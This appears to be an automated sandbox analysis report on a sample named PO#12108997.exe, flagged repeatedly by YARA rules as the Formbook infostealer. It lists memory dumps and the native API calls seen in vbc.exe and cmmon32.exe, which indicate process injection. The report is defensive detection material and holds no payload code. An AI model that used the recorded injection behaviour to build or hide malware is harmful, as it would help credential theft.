Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: initial sample Static PE information: Filename: PO#12108997.exe
Source: PO#12108997.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: String function: 0557B150 appears 72 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04A5B150 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A360 NtCreateFile, 4_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A410 NtReadFile, 4_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A490 NtClose, 4_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A540 NtAllocateVirtualMemory, 4_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A35A NtCreateFile,NtReadFile, 4_2_0041A35A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A3B2 NtCreateFile, 4_2_0041A3B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A40A NtReadFile, 4_2_0041A40A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0041A5BA NtAllocateVirtualMemory, 4_2_0041A5BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9540 NtReadFile,LdrInitializeThunk, 4_2_055B9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B95D0 NtClose,LdrInitializeThunk, 4_2_055B95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_055B9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_055B9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_055B97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_055B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_055B96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_055B9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B99A0 NtCreateSection,LdrInitializeThunk, 4_2_055B99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9840 NtDelayExecution,LdrInitializeThunk, 4_2_055B9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_055B9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_055B98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A50 NtCreateFile,LdrInitializeThunk, 4_2_055B9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_055B9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A20 NtResumeThread,LdrInitializeThunk, 4_2_055B9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9560 NtWriteFile, 4_2_055B9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BAD30 NtSetContextThread, 4_2_055BAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9520 NtWaitForSingleObject, 4_2_055B9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B95F0 NtQueryInformationFile, 4_2_055B95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9770 NtSetInformationFile, 4_2_055B9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BA770 NtOpenThread, 4_2_055BA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9760 NtOpenProcess, 4_2_055B9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BA710 NtOpenProcessToken, 4_2_055BA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9730 NtQueryVirtualMemory, 4_2_055B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9FE0 NtCreateMutant, 4_2_055B9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9650 NtQueryValueKey, 4_2_055B9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9670 NtQueryInformationProcess, 4_2_055B9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9610 NtEnumerateValueKey, 4_2_055B9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B96D0 NtCreateKey, 4_2_055B96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9950 NtQueueApcThread, 4_2_055B9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B99D0 NtCreateProcessEx, 4_2_055B99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BB040 NtSuspendThread, 4_2_055BB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9820 NtEnumerateKey, 4_2_055B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B98A0 NtWriteVirtualMemory, 4_2_055B98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9B00 NtSetValueKey, 4_2_055B9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055BA3B0 NtGetContextThread, 4_2_055BA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A10 NtQuerySection, 4_2_055B9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B9A80 NtOpenDirectoryObject, 4_2_055B9A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A995D0 NtClose,LdrInitializeThunk, 17_2_04A995D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99560 NtWriteFile,LdrInitializeThunk, 17_2_04A99560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99540 NtReadFile,LdrInitializeThunk, 17_2_04A99540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A996E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_04A996E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A996D0 NtCreateKey,LdrInitializeThunk, 17_2_04A996D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99610 NtEnumerateValueKey,LdrInitializeThunk, 17_2_04A99610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_04A99660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99650 NtQueryValueKey,LdrInitializeThunk, 17_2_04A99650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99780 NtMapViewOfSection,LdrInitializeThunk, 17_2_04A99780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99FE0 NtCreateMutant,LdrInitializeThunk, 17_2_04A99FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99710 NtQueryInformationToken,LdrInitializeThunk, 17_2_04A99710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99770 NtSetInformationFile,LdrInitializeThunk, 17_2_04A99770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_04A99860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99840 NtDelayExecution,LdrInitializeThunk, 17_2_04A99840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A999A0 NtCreateSection,LdrInitializeThunk, 17_2_04A999A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_04A99910
